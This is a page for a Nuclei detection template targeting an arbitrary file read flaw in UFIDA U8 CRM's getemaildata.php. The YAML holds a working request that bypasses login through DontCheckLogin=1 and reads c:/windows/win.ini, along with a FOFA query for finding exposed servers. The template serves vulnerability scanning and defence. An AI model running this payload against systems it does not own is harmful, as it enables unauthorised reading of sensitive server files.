UFIDA U8 CRM getemaildata.php - Arbitrary File Read

ID: yonyou-u8-crm-lfi

Severity: high

Author: SleepingBag945

Tags: yonyou,u8-crm,lfi

Description

There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability.

YAML Source

id: yonyou-u8-crm-lfi

info:
  name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read
  author: SleepingBag945
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="用友U8CRM"
  tags: yonyou,u8-crm,lfi

http:
  - raw:
      - |
        POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1,"bit app support") && contains(body_1,"extensions") && contains(body_1,"fonts")'
        condition: and
# digest: 4a0a0047304502210089d9b133d28c4cec75f4c4ebb653b0cc3e0244dbd1668607c90125250d5ff57702207224b1e5a9c4fa8aada08d7381b901666ffded82e3b7619dc7e751385cb4528f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml"

View on Github